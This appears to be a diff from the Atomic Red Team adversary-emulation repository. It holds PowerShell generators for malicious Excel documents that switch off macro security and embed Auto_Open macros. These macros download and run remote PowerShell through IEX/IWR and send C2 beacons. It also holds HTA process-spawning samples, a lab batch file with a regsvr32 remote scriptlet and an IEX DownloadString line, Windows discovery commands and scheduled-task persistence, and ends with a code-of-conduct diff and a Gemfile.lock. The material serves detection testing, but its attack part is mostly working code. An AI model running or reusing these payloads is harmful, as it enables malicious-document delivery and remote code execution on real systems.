#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-ShellBrowserWindow {
<#
.SYNOPSIS
Excel COM Trampoline.
.DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const ShellBrowserWindow = _
"{C08AFD90-F2A1-11D1-8455-00A0C91F3880}"
Set SBW = GetObject("new:" & ShellBrowserWindow)
SBW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-wshshell {
<#
.SYNOPSIS
Excel COM WshShell.
.DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')")
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-GET {
<#
.SYNOPSIS
Standard macro execution.
.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-POST {
<#
.SYNOPSIS
Standard macro execution.
.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "POST", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
#Determine Attack
Do {
Write-Host "
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------"
$AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
} until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4" -or $AttackNum -eq "5" -or $AttackNum -eq "6" -or $AttackNum -eq "7" -or $AttackNum -eq "8")
#Initiate Attack Choice
if($AttackNum -eq "1"){
Excel-Com-Trampoline
}
elseif($AttackNum -eq "2"){
Excel-Com-Wmiprvse-Trampoline
}
elseif($AttackNum -eq "3"){
Excel-Com-Wmiprvse-Benign-Trampoline
}
elseif($AttackNum -eq "4"){
Excel-Shell
}
elseif($AttackNum -eq "5"){
Excel-Com-ShellBrowserWindow
}
elseif($AttackNum -eq "6"){
Excel-Com-wshshell
}
elseif($AttackNum -eq "7"){
Excel-Shell-C2-POST
}
elseif($AttackNum -eq "8"){
Excel-Shell-C2-GET
}
ARTifacts/Initial_Access/hta.md
+43
View File
@@ -0,0 +1,43 @@
# HTA
## AtomicHTA
Three ways to spawn calc using HTA. Each are customizable to download a chain reaction to perform additional behaviors.
## MSHTA - Explorer Spawning CMD
Using COM objects, mshta runs with no child processes. Explorer.exe spawns and executes cmd -> calc.
```
// Type One
// Child of Explorer, cmd.exe
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
var SW = GetObject("new:" + ShellWindows).Item();
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
```
## MSHTA - Wmiprvse Spawning CMD
Using COM objects, mshta runs with no child processes. Wmiprvse spawns and executes cmd -> calc.
```
// Type Two
// Child of wmiprvse
var strComputer = ".";
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
```
## MSHTA spawning CMD
Mshta spawns child process of calc.exe.
```
// Type Three
// Child of mshta.exe
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
ARTifacts/Misc/Discovery.bat
+44
View File
@@ -0,0 +1,44 @@
net user Administrator /domain
net Accounts
net localgroup administrators
net use
net share
net group "domain admins" /domain
net config workstation
net accounts
net accounts /domain
net view
sc.exe query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
wmic useraccount list
wmic useraccount get /ALL
wmic startup list brief
wmic share list
wmic service get name,displayname,pathname,startmode
wmic process list brief
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
arp -a
whoami
ipconfig /displaydns
route print
netsh advfirewall show allprofiles
systeminfo
qwinsta
quser
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
CODE_OF_CONDUCT.md
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Director of Open Source Programs Adam Mashinchi** via Slack direct message or [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
Gemfile.lock
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.11.1)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.6.0)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.5)
dnsruby (1.61.3)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.11.1)
forwardable-extended (2.6.0)
gemoji (3.0.1)
github-pages (198)
activesupport (= 4.2.11.1)
github-pages-health-check (= 1.16.1)
jekyll (= 3.8.5)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.12.1)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.6.0)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.2)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.5, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.16.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 3.0)
typhoeus (~> 1.3)
html-pipeline (2.12.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.8.5)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.3.1)
commonmarker (~> 0.14)
jekyll (>= 3.7, < 5.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.12.1)
jekyll (~> 3.4)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.6.0)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.2.1)
listen (~> 3.0)
jemoji (0.10.2)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.1.1)
nokogiri (1.10.8)
mini_portile2 (~> 2.4.0)
octokit (4.14.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (3.1.1)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (2.0.0)
safe_yaml (1.0.5)
sass (3.7.4)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
